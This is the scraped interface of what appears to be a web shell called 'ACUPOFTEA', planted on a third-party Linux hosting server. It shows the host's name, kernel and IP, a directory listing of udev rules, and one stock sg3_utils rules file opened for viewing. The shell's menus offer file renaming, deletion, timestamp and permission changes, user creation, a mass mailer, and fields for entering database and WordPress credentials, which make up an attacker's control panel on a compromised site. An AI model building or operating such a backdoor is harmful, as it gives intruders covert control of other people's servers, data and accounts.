System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
udev
/
rules.d
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
61-scsi-sg3_id.rules
# SCSI-ID mappings for sg3_utils ACTION=="remove", GOTO="sg3_utils_id_end" SUBSYSTEM!="block", GOTO="sg3_utils_id_end" # Import values for partitions ENV{DEVTYPE}=="partition", IMPORT{parent}="SCSI_*", ENV{ID_SCSI}="1" # SCSI INQUIRY values # If the 'inquiry' sysfs attribute is present the kernel will already # have scanned for VPD pages, so if the vpd page attribute is not # present it is not supported (or deemed unsafe to access). # Hence we can skip the call to sg_inq and avoid I/O altogether. # Set 'ID_SCSI_INQUIRY=0' in an earlier udev rule if the kernel # fails to scan VPD pages correctly; the rules will then fall # back to calling sg_vpd directly. KERNEL=="sd*[!0-9]|sr*", ENV{ID_SCSI_INQUIRY}!="?*", IMPORT{program}="/usr/bin/sg_inq --export --inhex=/sys/block/$kernel/device/inquiry --raw", ENV{ID_SCSI}="1", ENV{ID_SCSI_INQUIRY}="1" KERNEL=="sd*[!0-9]|sr*", ENV{ID_SCSI}!="1", IMPORT{program}="/usr/bin/sg_inq --export $tempnode", ENV{ID_SCSI}="1" # scsi_id compat mappings ENV{SCSI_VENDOR}=="?*", ENV{ID_VENDOR}="$env{SCSI_VENDOR}" ENV{SCSI_VENDOR_ENC}=="?*", ENV{ID_VENDOR_ENC}="$env{SCSI_VENDOR_ENC}" ENV{SCSI_MODEL}=="?*", ENV{ID_MODEL}="$env{SCSI_MODEL}" ENV{SCSI_MODEL_ENC}=="?*", ENV{ID_MODEL_ENC}="$env{SCSI_MODEL_ENC}" ENV{SCSI_REVISION}=="?*", ENV{ID_REVISION}="$env{SCSI_REVISION}" ENV{SCSI_TYPE}=="?*", ENV{ID_TYPE}="$env{SCSI_TYPE}" # SCSI EVPD page 0x80 values KERNEL=="sd*[!0-9]|sr*", ENV{ID_SCSI}=="1", ENV{ID_SCSI_INQUIRY}=="1", IMPORT{program}="/usr/bin/sg_inq --export --inhex=/sys/block/$kernel/device/vpd_pg80 --raw" KERNEL=="sd*[!0-9]|sr*", ENV{ID_SCSI}=="1", ENV{ID_SCSI_INQUIRY}!="1", IMPORT{program}="/usr/bin/sg_inq --export --page=sn $tempnode" # SCSI EVPD page 0x83 values KERNEL=="sd*[!0-9]", ENV{ID_SCSI}=="1", ENV{ID_SCSI_INQUIRY}=="1", IMPORT{program}="/usr/bin/sg_inq --export --inhex=/sys/block/$kernel/device/vpd_pg83 --raw" KERNEL=="sd*[!0-9]|sr*", ENV{ID_SCSI}=="1", ENV{ID_SCSI_INQUIRY}!="1", IMPORT{program}="/usr/bin/sg_inq --export --page=di $tempnode" # ID_WWN compat mapping ENV{SCSI_IDENT_LUN_NAA_REGEXT}=="?*", ENV{ID_WWN}!="?*", ENV{ID_WWN}="0x$env{SCSI_IDENT_LUN_NAA_REGEXT}" ENV{SCSI_IDENT_LUN_NAA_REG}=="?*", ENV{ID_WWN}!="?*", ENV{ID_WWN}="0x$env{SCSI_IDENT_LUN_NAA_REG}" ENV{SCSI_IDENT_LUN_NAA_EXT}=="?*", ENV{ID_WWN}!="?*", ENV{ID_WWN}="0x$env{SCSI_IDENT_LUN_NAA_EXT}" ENV{SCSI_IDENT_LUN_NAA_LOCAL}=="?*", ENV{ID_WWN}!="?*", ENV{ID_WWN}="0x$env{SCSI_IDENT_LUN_NAA_LOCAL}" ENV{SCSI_IDENT_LUN_NAA_REGEXT}=="?*", ENV{ID_WWN_WITH_EXTENSION}!="?*", ENV{ID_WWN_WITH_EXTENSION}="0x$env{SCSI_IDENT_LUN_NAA_REGEXT}" ENV{SCSI_IDENT_LUN_NAA_EXT}=="?*", ENV{ID_WWN_WITH_EXTENSION}!="?*", ENV{ID_WWN_WITH_EXTENSION}="0x$env{SCSI_IDENT_LUN_NAA_EXT}" ENV{ID_WWN}=="?*", ENV{ID_WWN_WITH_EXTENSION}!="?*", ENV{ID_WWN_WITH_EXTENSION}="$env{ID_WWN}" # ata_id compability ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_ATA}=="?*", ENV{ID_BUS}="ata", ENV{ID_ATA}="1", ENV{ID_SERIAL}="$env{SCSI_IDENT_LUN_ATA}" ENV{ID_SERIAL_SHORT}!="?*", ENV{SCSI_VENDOR}=="ATA", ENV{SCSI_IDENT_LUN_VENDOR}=="?*", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_VENDOR}" # Compat ID_SERIAL setting ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_NAA_REGEXT}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="3$env{SCSI_IDENT_LUN_NAA_REGEXT}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_NAA_REGEXT}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_NAA_REG}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="3$env{SCSI_IDENT_LUN_NAA_REG}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_NAA_REG}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_NAA_EXT}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="3$env{SCSI_IDENT_LUN_NAA}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_NAA_EXT}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_EUI64}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="2$env{SCSI_IDENT_LUN_EUI64}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_EUI64}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_NAME}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="8$env{SCSI_IDENT_LUN_NAME}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_NAME}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_T10}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="1$env{SCSI_IDENT_LUN_T10}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_T10}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_NAA_LOCAL}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="3$env{SCSI_IDENT_LUN_NAA_LOCAL}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_NAA_LOCAL}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_LUN_VENDOR}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="0$env{SCSI_VENDOR}_$env{SCSI_MODEL}_$env{SCSI_IDENT_LUN_VENDOR}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_LUN_VENDOR}" ENV{ID_SERIAL}!="?*", ENV{SCSI_IDENT_SERIAL}=="?*", ENV{ID_BUS}="scsi", ENV{ID_SERIAL}="S$env{SCSI_VENDOR}_$env{SCSI_MODEL}_$env{SCSI_IDENT_SERIAL}", ENV{ID_SERIAL_SHORT}="$env{SCSI_IDENT_SERIAL}" LABEL="sg3_utils_id_end"
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-04-23 10:58:40
10-dm.rules
text/plain
7.1 KB
-r--r--r--
2025-07-15 09:03:10
11-dm-parts.rules
text/plain
1.41 KB
-rw-r--r--
2025-04-22 01:55:39
13-dm-disk.rules
text/plain
1.75 KB
-r--r--r--
2025-07-15 09:03:10
40-elevator.rules
text/plain
728 B
-rw-r--r--
2025-04-22 01:57:50
40-redhat.rules
text/plain
1.79 KB
-rw-r--r--
2025-04-22 01:57:53
40-usb-blacklist.rules
text/plain
457 B
-rw-r--r--
2022-10-08 10:09:12
50-udev-default.rules
text/plain
3.66 KB
-rw-r--r--
2025-04-22 01:58:19
60-alias-kmsg.rules
text/plain
357 B
-rw-r--r--
2025-04-22 01:57:55
60-block.rules
text/plain
626 B
-rw-r--r--
2025-04-22 01:57:50
60-cdrom_id.rules
text/plain
1.05 KB
-rw-r--r--
2018-06-22 11:11:49
60-drm.rules
text/plain
413 B
-rw-r--r--
2018-06-22 11:11:49
60-evdev.rules
text/plain
974 B
-rw-r--r--
2018-06-22 11:11:49
60-fido-id.rules
text/plain
165 B
-rw-r--r--
2025-04-22 01:57:54
60-input-id.rules
text/plain
282 B
-rw-r--r--
2018-06-22 11:11:49
60-net.rules
text/plain
129 B
-rw-r--r--
2022-08-10 01:03:37
60-persistent-alsa.rules
text/plain
616 B
-rw-r--r--
2018-06-22 11:11:49
60-persistent-input.rules
text/plain
2.65 KB
-rw-r--r--
2018-06-22 11:11:49
60-persistent-storage-tape.rules
text/plain
1.61 KB
-rw-r--r--
2025-04-22 01:57:57
60-persistent-storage.rules
text/plain
6.38 KB
-rw-r--r--
2018-06-22 11:11:49
60-persistent-v4l.rules
text/plain
769 B
-rw-r--r--
2018-06-22 11:11:49
60-raw.rules
text/plain
326 B
-rw-r--r--
2024-04-06 01:02:51
60-sensor.rules
text/plain
727 B
-rw-r--r--
2018-06-22 11:11:49
60-serial.rules
text/plain
1.16 KB
-rw-r--r--
2018-06-22 11:11:49
60-tpm-udev.rules
text/plain
211 B
-rw-r--r--
2019-10-17 03:56:47
61-scsi-sg3_id.rules
text/plain
4.67 KB
-rw-r--r--
2017-09-18 07:15:01
63-fc-wwpn-id.rules
text/plain
624 B
-rw-r--r--
2022-10-08 10:09:12
63-scsi-sg3_symlink.rules
text/plain
2.82 KB
-rw-r--r--
2015-10-29 08:52:08
64-btrfs.rules
text/plain
616 B
-rw-r--r--
2025-04-22 01:58:19
66-kpartx.rules
text/plain
1.12 KB
-rw-r--r--
2025-04-22 01:55:39
68-del-part-nodes.rules
text/plain
1.12 KB
-rw-r--r--
2025-04-22 01:55:39
70-joystick.rules
text/plain
432 B
-rw-r--r--
2018-06-22 11:11:49
70-mouse.rules
text/plain
734 B
-rw-r--r--
2018-06-22 11:11:49
70-power-switch.rules
text/plain
568 B
-rw-r--r--
2018-06-22 11:11:49
70-touchpad.rules
text/plain
473 B
-rw-r--r--
2018-06-22 11:11:49
70-uaccess.rules
text/plain
2.61 KB
-rw-r--r--
2018-06-22 11:11:49
71-biosdevname.rules
text/plain
995 B
-rw-r--r--
2019-10-18 08:07:58
71-prefixdevname.rules
text/plain
403 B
-rw-r--r--
2019-12-16 07:52:15
71-seat.rules
text/plain
2.69 KB
-rw-r--r--
2025-04-22 01:58:19
73-idrac.rules
text/plain
316 B
-rw-r--r--
2025-04-22 01:57:49
73-seat-late.rules
text/plain
636 B
-rw-r--r--
2025-04-22 01:58:24
75-net-description.rules
text/plain
452 B
-rw-r--r--
2018-06-22 11:11:49
75-probe_mtd.rules
text/plain
174 B
-rw-r--r--
2018-06-22 11:11:49
78-sound-card.rules
text/plain
4.7 KB
-rw-r--r--
2018-06-22 11:11:49
80-drivers.rules
text/plain
615 B
-rw-r--r--
2018-06-22 11:11:49
80-net-setup-link.rules
text/plain
292 B
-rw-r--r--
2018-06-22 11:11:49
84-nm-drivers.rules
text/plain
533 B
-rw-r--r--
2022-10-10 01:57:58
85-nm-unmanaged.rules
text/plain
1.97 KB
-rw-r--r--
2022-10-11 07:42:01
90-iprutils.rules
text/plain
70 B
-rw-r--r--
2020-05-08 02:19:42
90-nm-thunderbolt.rules
text/plain
588 B
-rw-r--r--
2022-10-10 01:57:58
90-vconsole.rules
text/plain
510 B
-rw-r--r--
2025-04-22 01:58:19
95-dm-notify.rules
text/plain
483 B
-r--r--r--
2025-07-15 09:03:10
98-kexec.rules
text/plain
695 B
-rw-r--r--
2024-09-24 08:36:00
99-nfs.rules
text/plain
95 B
-rw-r--r--
2025-06-04 10:53:59
99-qemu-guest-agent.rules
text/plain
130 B
-rw-r--r--
2025-08-07 12:04:07
99-systemd.rules
text/plain
4.26 KB
-rw-r--r--
2025-04-22 01:58:19
~ ACUPOFTEA - mail.ontime-ae.com